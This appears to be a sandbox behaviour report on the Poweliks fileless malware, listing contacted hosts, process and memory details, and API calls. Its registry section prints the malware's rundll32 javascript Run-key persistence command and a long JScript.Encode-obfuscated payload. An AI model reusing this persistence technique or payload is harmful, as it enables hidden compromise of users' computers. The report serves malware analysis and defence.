Poweliks Fileless Malware | Grouped Behavior
Try VMRay Analyzer
Involved Hosts

Host Resolved to Country City Protocol
178.89.159.34 178.89.159.34 KZ DNS, TCP
178.89.159.35 178.89.159.35 KZ DNS, TCP
Monitored Processes
Process Graph
Behavior Information - Grouped by Category
Process #1: poweliks_installer.exe
(Host: 1622, Network: 7)
+
Information Value
ID #1
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\poweliks_installer.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\poweliks_installer.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:10, Reason: Analysis Target
Unmonitor End Time: 00:02:12, Reason: Terminated by Timeout
Monitor Duration 00:02:02
OS Process Information
+
Information Value
PID 0xa00
Parent PID 0x564 (c:\windows\explorer.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Groups
  • XDUWTFONO\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010611 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A04
0x A14
0x A8C
0x A90
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True True False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True True False
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False
  • Region Actions
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000000000210000 0x00210000 0x00224fff Private Memory Readable True True False
private_0x0000000000230000 0x00230000 0x00233fff Private Memory Readable, Writable True True False
pagefile_0x0000000000230000 0x00230000 0x00231fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000000240000 0x00240000 0x002bffff Private Memory Readable, Writable True True False
private_0x00000000002c0000 0x002c0000 0x002c3fff Private Memory Readable, Writable True True False
windowsshell.manifest 0x002c0000 0x002c0fff Memory Mapped File Readable False False False
  • Region Actions
pagefile_0x00000000002c0000 0x002c0000 0x002c0fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x00000000002d0000 0x002d0000 0x002d6fff Private Memory Readable, Writable True True False
pagefile_0x00000000002d0000 0x002d0000 0x002d1fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x00000000002e0000 0x002e0000 0x0033ffff Private Memory Readable, Writable True True False
index.dat 0x002e0000 0x002ebfff Memory Mapped File Readable, Writable True False False
  • Region Actions
index.dat 0x002f0000 0x002f7fff Memory Mapped File Readable, Writable True False False
  • Region Actions
private_0x0000000000300000 0x00300000 0x0033ffff Private Memory Readable, Writable True True False
index.dat 0x00340000 0x0034ffff Memory Mapped File Readable, Writable True False False
  • Region Actions
private_0x0000000000350000 0x00350000 0x0038ffff Private Memory Readable, Writable True True False
private_0x0000000000390000 0x00390000 0x00390fff Private Memory Readable, Writable True True False
private_0x0000000000390000 0x00390000 0x00393fff Private Memory Readable, Writable True True False
private_0x00000000003a0000 0x003a0000 0x003a4fff Private Memory Readable, Writable True True False
private_0x00000000003b0000 0x003b0000 0x003b5fff Private Memory Readable, Writable True True False
private_0x00000000003c0000 0x003c0000 0x003c7fff Private Memory Readable, Writable True True False
private_0x00000000003d0000 0x003d0000 0x003e2fff Private Memory Readable, Writable True True False
pagefile_0x00000000003f0000 0x003f0000 0x003f0fff Pagefile Backed Memory Readable True False False
  • Region Actions
poweliks_installer.exe 0x00400000 0x00414fff Memory Mapped File Readable, Writable, Executable True True False
private_0x0000000000420000 0x00420000 0x004bffff Private Memory Readable, Writable True True False
pagefile_0x0000000000420000 0x00420000 0x00420fff Pagefile Backed Memory Readable True False False
  • Region Actions
scrrun.dll 0x00430000 0x00444fff Memory Mapped File Readable False False False
  • Region Actions
scrrun.dll 0x00450000 0x00464fff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000000000470000 0x00470000 0x004affff Private Memory Readable, Writable True True False
private_0x00000000004b0000 0x004b0000 0x004bffff Private Memory Readable, Writable True True False
private_0x00000000004c0000 0x004c0000 0x005bffff Private Memory Readable, Writable True True False
private_0x00000000005c0000 0x005c0000 0x006bffff Private Memory Readable, Writable True True False
private_0x00000000006c0000 0x006c0000 0x006fffff Private Memory Readable, Writable True True False
private_0x0000000000740000 0x00740000 0x0074ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000750000 0x00750000 0x008d7fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x00000000008e0000 0x008e0000 0x00a60fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000000a70000 0x00a70000 0x01e6ffff Pagefile Backed Memory Readable True False False
  • Region Actions
sortdefault.nls 0x01e70000 0x0213efff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000000002140000 0x02140000 0x0226ffff Private Memory Readable, Writable True True False
private_0x0000000002140000 0x02140000 0x0222ffff Private Memory Readable, Writable True True False
private_0x0000000002230000 0x02230000 0x0226ffff Private Memory Readable, Writable True True False
private_0x0000000002270000 0x02270000 0x0236ffff Private Memory Readable, Writable True True False
private_0x0000000002270000 0x02270000 0x0235ffff Private Memory Readable, Writable True True False
private_0x0000000002360000 0x02360000 0x0236ffff Private Memory Readable, Writable True True False
private_0x0000000002370000 0x02370000 0x0247ffff Private Memory Readable, Writable True True False
pagefile_0x0000000002480000 0x02480000 0x0255efff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000002560000 0x02560000 0x0265ffff Private Memory Readable, Writable True True False
private_0x0000000002660000 0x02660000 0x0275ffff Private Memory Readable, Writable True True False
uxtheme.dll 0x738b0000 0x7392ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64win.dll 0x73a70000 0x73acbfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64.dll 0x73ad0000 0x73b0efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64cpu.dll 0x73b40000 0x73b47fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
jscript.dll 0x74a70000 0x74b21fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
sxs.dll 0x74bc0000 0x74c1efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
version.dll 0x74c20000 0x74c28fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
scrrun.dll 0x74c30000 0x74c59fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rasadhlp.dll 0x74c60000 0x74c65fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
fwpuclnt.dll 0x74c70000 0x74ca7fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
winrnr.dll 0x74cb0000 0x74cb7fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
pnrpnsp.dll 0x74cc0000 0x74cd1fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
napinsp.dll 0x74ce0000 0x74ceffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
nlaapi.dll 0x74cf0000 0x74cfffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wshtcpip.dll 0x74d00000 0x74d04fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
mswsock.dll 0x74d10000 0x74d4bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
winnsi.dll 0x74d50000 0x74d56fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
iphlpapi.dll 0x74d60000 0x74d7bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
dnsapi.dll 0x74d80000 0x74dc3fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ntmarta.dll 0x74dd0000 0x74df0fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
profapi.dll 0x74e00000 0x74e0afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
comctl32.dll 0x74e10000 0x74fadfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cryptbase.dll 0x750b0000 0x750bbfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sspicli.dll 0x750c0000 0x7511ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
user32.dll 0x75120000 0x7521ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sechost.dll 0x75240000 0x75258fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msvcrt.dll 0x75260000 0x7530bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernelbase.dll 0x75320000 0x75365fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ws2_32.dll 0x75380000 0x753b4fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rpcrt4.dll 0x753c0000 0x754affff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
gdi32.dll 0x754e0000 0x7556ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ole32.dll 0x75570000 0x756cbfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
clbcatq.dll 0x756d0000 0x75752fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shell32.dll 0x75790000 0x763d9fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
oleaut32.dll 0x763e0000 0x7646efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
urlmon.dll 0x76470000 0x765a5fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernel32.dll 0x765b0000 0x766bffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
lpk.dll 0x76750000 0x76759fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
advapi32.dll 0x76760000 0x767fffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
crypt32.dll 0x768e0000 0x769fcfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msctf.dll 0x76a00000 0x76acbfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
imm32.dll 0x76ad0000 0x76b2ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
usp10.dll 0x76b30000 0x76bccfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
nsi.dll 0x76bd0000 0x76bd5fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wininet.dll 0x76be0000 0x76cd4fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wldap32.dll 0x76ce0000 0x76d24fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
iertutil.dll 0x76d30000 0x76f2afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shlwapi.dll 0x77100000 0x77156fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x0000000077160000 0x77160000 0x77259fff Private Memory Readable, Writable, Executable True True False
private_0x0000000077260000 0x77260000 0x7737efff Private Memory Readable, Writable, Executable True True False
ntdll.dll 0x77380000 0x77528fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msasn1.dll 0x77530000 0x7753bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ntdll.dll 0x77560000 0x776dffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True True False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True True False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True True False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True True False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True True False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True True False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
  • Region Actions
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
  • Region Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
  • Region Actions
Modified Files
+
Filename File Size Hash Values YARA Match Actions
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat 48.00 KB (49152 bytes) MD5: e240cbb4588ea4f6d728281bb03d4868
SHA1: e0ecab06cf1a6d34af4f54ea2fde9189572ede3d
SHA256: 5eb84960d0e21d21afbee036ca968627e0920a0ec9ad0804e6271b15441ef2a5 		False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\cookies\index.dat 32.00 KB (32768 bytes) MD5: 52860b79194a2bd3b1e66300587b21cf
SHA1: faa8d7915f6733c93678128d032d26c150eb1550
SHA256: b3e7c1e6e0d6859d21aadf673fc01f33289fb30ce4b39edb6ecaccc0f8ff6f0a 		False
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\history\history.ie5\index.dat 64.00 KB (65536 bytes) MD5: fbdf4ba6c43b1ae50b9cef65661d27d5
SHA1: b82e77ed9a3dff893f0a5266c470ed67d3f48856
SHA256: c608d3ec31fe48785961b02a20dc1e9f1e2c5710e4c6ae9ddbb1472db238ec73 		False
Host Behavior
File (2)
+
Operation Filename Additional Information Success Count Logfile
Get Info STD_INPUT_HANDLE type = attributes,time,size,volserialno False 2
Fn
Registry (5)
+
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run True 1
Fn
Create Key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\ True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features False 1
Fn
Write Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>"), size = 464, type = REG_SZ True 1
Fn
Write Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92 \rDGUs+UYUODbxLdvJ]Ar NrDuE*i2{h3J-'/HdhKhc'-Ar NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW' nSP)1Yb\+or(%+1YcJUm.raYk LRwkVjz/D+sr8Ln^DJbi6;x1YrG Pm[Uv#`YMzPDnDEMxPmR"no"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw- nY,0.Cs+hG.0Pd+D;a-w Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PDY;DU~ZiN86;x1YrG PNc;* a' nSP)1Yb\+or(%+1YcJt/ah^ RUnD7+Do\JC:KhRRTE*iaRK2+ `E!AKJS;B0CVkn*iac/xNv#p;0 'CRA62C N2 -kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP6Yor^+cE6UD~OME~O8#pr0vEWY* ;WDRMrY`6c.n/aW /nAG[H#IE6OR;VGd`#I;6'WR;.lOK6Ywk^n`!0U~DD;n*iE6O'6RMOok^+vEWxObpEW/{;0DR62xbdP6O?D.lhv#pE0kR"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnVYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nYsrV`;W #i)Nh4kVcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2 \r.Kx:UYvJnMG^+k/r#b`ECr#xJbn6,`,P6Y 3 mGNbUTTl=bUZq&RVnYUY.k oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\x#;I&I28ycL}y]Fj!wXI!T|wOpI(Bt(#T\(qKiMOylo]24ycOH/6Heq*V5o]\1xV1xsIz[qj2(U$(.u^h\.Y9(U)3`MoXIqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4 ]2( qtm*;"M.sClVI_s;5qFa5Ts"^y.O5sa*nZ46\(mOPy95}qHZqog*1&I^4UX?\t/\HTm,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k8H*1&]V(?Xj\}ktg!lq1;S0.Dlpp;}o1"}qqk(Cs/9VdtV.zpqHN}pgyoKW+j #En?X2\t2(:.Anlt4qs%Kq,0N 6sF;9B40qV(1zjF-t_.d}U(k9!\t(C1^|UX2\tw(:#i(A^FZx1+`]s4V. 5pIs#_VA}U(/&3HdI(1"JwAq5saa5zXK\sk}q}/5XymjHdI(1.J2wFNV194Vs.mzqd 81Xm2]V(?XH96TCq14m2]A} XV\ sZ}jTw}X]j($s5x.a8M"VmbX3}q}a4h.98y*"N_BFI&]-1kori^IPmV#Nl w/::sD}Uaqm]V5xsPmmkiCjk4Vs%qb6(jfV"[V.OS^BV\:asI&I28yc;pyok4!^E\!174 tV(x]w( X"oKW+i&"t4s]4mspk9oA4^ssO}o]V1x\2dV1s[AVOmVa^4 jE9MsZlq1E":at\&\G&V988x"w4qidKqs!5 Nst;q2rH]j($s5x.28VIsmbXA} \w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp sKm^d::.fiy6-N;aqlpx!9skqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!UqA(M.Otq*T5o]a4+lM(Ms mHLk`x#E9MsO\?6gelt}y#Vqb3Fmh.T[o9;q;]j($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6tq(:1ZCOEqV[4+8A4mhsO(;t8jVoXIqs9M.zFwA-mysZl OEhKbkKqoE\Mo!(&BXh?I`^xjV|jTL81ZmhV;t8!L9Aq\\C#d\?68iVsz5qq^N!jXnsA7mys!m1EhK3d:s!tMw!42BXnUI`mU.sFj!L8H!1:s;\F!LBwAz4yH^}ujX\?3F9wH*1&]V(jo"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\*T]V,O5qs!SV9V92s.my#YI:aw\(\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne("w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj*.e\VKsoTlo}^K .TCV,Vm.T3`&s"9M.O}o1"}qqb4u0E" .Z._sh\?Lk:s%1:,.8 \!S^[24NHHSs.;^ysh}`Xt9Ms+\jFs[Vt-}_\b|PDX\(I8ms*oxs#E1 oh\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np "31:..mH(wd3sE9:1.\?o08xj/4;a)|wY:+p1Ttq!;j #E9MsO\?*B8 Isms1Sj+jX9:VN}o\EUMoE\Mas`:.sp?4r}o^OKy9$} 1T(w1Xm2]V(?Xj9*TCqFsS0s!N!jX(&A:}oB mHV1XX(I*08Mj?}qeG|A*^NzFKesws52}oUXT`CIzFUhV.qX.5 \V::sZlotV:#!mM1V1X*_t("1}o]G4ypKqVNs[AF-}_#/\j44(:IdtUq2S0s!NhOD\?o04 #/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174 tV1x]N}L2!1:,D}:wy}:eTj2IHl *UF;9 oty\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(aG19Deja? 4t5qFq4 V##y.pI2$yq:1d":,!C_sHHsonjhw|qs$?sqwj.[Dj![-9.w782\h4V4a0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joAf$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt. AF$?o]~I3\n"CN~+w[cts4Ij2^Xmswgt2I6Io4Aq*t?o9VCVt%4saZMOeI!sHtA}"Iq]k}3\2Us9bj skt3XZf$pgsw_ix^l.yB(js9W+hH* 0}+}ZHHjts:21pe`Isj2[\}og(:M1`pZXq:[vd&s+wUikDw4wo 4`In. }CCN9flZe65:Os"Z,fn_3+48)7I34Igj%WlGov(&]5!sT5FAx[2js?Vs3s} pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\s|qM#XUV9^i!\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\w:2Ix58$!9FB2m(2P" mH f4Apj$Jljj.H!w# ws$SZsh`:tP:s9hn`6e}^oAHV^h"j90p:t?5LHI\so;dF9snj":} [652.oI!}h[Z*Vj`1|\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$"CVA^Mg250(apsYGI/Y$6o3+1w)!"fH#"MVe _m-HwLZlP~5g2%SVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA"f1yro2." 1Adys9UV9sCj\&pUOoIsNwpisB[A6 ?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C3!Z[2Df?oHXK.o8HVs-[0,G5yAh"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15xA~FygKNy(-js}:IuN2t..i}^B*VsT9FA$i_N21Gt~piwA5m.NZB25j(h`FVa}2s"njX2N8$B.q5l.%IB8A5q?j4A\2Hq:stfi`Ie}s2H?!Oy"MtNpN#Z`?dy9!1"UM3S\y";.joBpq6AS+Is#;, }0H|5K]}"29BP:N$?w40lP~5gMmW58#xL4A\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\j*$iAVUH^LSpiOyt:3XV[njVLhI&2p:V}yCV& 4^o2l^tM? V _N31yH5q:1e` I$n`qTNN45piwA"fA~KjBA`xo2C[\dFIs}LAFp`ear`s5K+3"]`.G}^G69y]TU.AB[AF9py4Xpi9\5k%..`sA}MG\tM#"5!!W}:\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js"\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\j2!l? oCj:*y}ssT"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\xtUi`N$IN#0."49"jsV.ZA&:M[A"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi"Z5jsxNN]W\LVh` 1T"3.x\j^Aq1]j`V`j+IhC29fjj$qIjo$`js$}^s5j#~roz\dF.5S8[wts#9Uy4%"s9"nsA\H8##.b%7.z%"#`F5j#A}s)-dF.}6:s9jG4qpi"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[ 1U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I +os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!"cpos6lV9+rj%-6js NN4`2]/5js}6:s9jG4qmT"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\H%-H`HrmMBigX%-6j2-+wt~KijA5tNpN$qKBM9V)"dX%Z82I6?:o!+A}A?o9%CAs$p`oA, size = 61266, type = REG_SZ True 1
Fn
Process (1)
+
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\rundll32.exe os_pid = 0xa3c, show_window = SW_HIDE True 1
Fn
Module (1604)
+
Operation Module Additional Information Success Count Logfile
Load ntdll base_address = 0x77560000 True 1
Fn
Load shlwapi base_address = 0x77100000 True 2
Fn
Load user32 base_address = 0x75120000 True 249
Fn
Load KERNEL32.dll base_address = 0x765b0000 True 1
Fn
Load ntdll.dll base_address = 0x77560000 True 1
Fn
Load WS2_32.dll base_address = 0x75380000 True 1
Fn
Load SHLWAPI.dll base_address = 0x77100000 True 1
Fn
Load urlmon.dll base_address = 0x76470000 True 1
Fn
Load RPCRT4.dll base_address = 0x753c0000 True 1
Fn
Load WININET.dll base_address = 0x76be0000 True 1
Fn
Load ADVAPI32.dll base_address = 0x76760000 True 2
Fn
Load SHELL32.dll base_address = 0x75790000 True 1
Fn
Load ole32.dll base_address = 0x75570000 True 1
Fn
Load OLEAUT32.dll base_address = 0x763e0000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x765b0000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x765b0000 True 5
Fn
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x77560000 True 1
Fn
Get Handle WS2_32.dll base_address = 0x0 False 1
Fn
Get Handle c:\windows\syswow64\shlwapi.dll base_address = 0x77100000 True 1
Fn
Get Handle urlmon.dll base_address = 0x0 False 1
Fn
Get Handle c:\windows\syswow64\rpcrt4.dll base_address = 0x753c0000 True 1
Fn
Get Handle c:\windows\syswow64\wininet.dll base_address = 0x76be0000 True 1
Fn
Get Handle c:\windows\syswow64\advapi32.dll base_address = 0x76760000 True 1
Fn
Get Handle SHELL32.dll base_address = 0x0 False 1
Fn
Get Handle c:\windows\syswow64\ole32.dll base_address = 0x75570000 True 1
Fn
Get Handle c:\windows\syswow64\oleaut32.dll base_address = 0x763e0000 True 1
Fn
Get Handle c:\users\5p5nrgjn0js halpmcxz\desktop\poweliks_installer.exe base_address = 0x400000 True 1
Fn
Get Filename c:\users\5p5nrgjn0js halpmcxz\desktop\poweliks_installer.exe process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\poweliks_installer.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\poweliks_installer.exe, size = 260 True 1
Fn
Get Filename SHELL32.dll process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\poweliks_installer.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\poweliks_installer.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = IsCharAlphaNumericW, address_out = 0x75147792 True 249
Fn
Get Address c:\windows\syswow64\user32.dll function = IsCharAlphaNumericA, address_out = 0x75146867 True 249
Fn
Get Address c:\windows\syswow64\user32.dll function = IsCharLowerA, address_out = 0x75194e30 True 249
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpiA, address_out = 0x765c3e8e True 498
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x765c1072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x765c5444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileExA, address_out = 0x765eccc1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExpandEnvironmentStringsA, address_out = 0x765deb39 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTempPathW, address_out = 0x765dd4dc True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileW, address_out = 0x765e830d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x765c1136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileA, address_out = 0x765e58e5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExpandEnvironmentStringsW, address_out = 0x765c4173 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x765c103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeProcess, address_out = 0x765d174d True 1
Fn
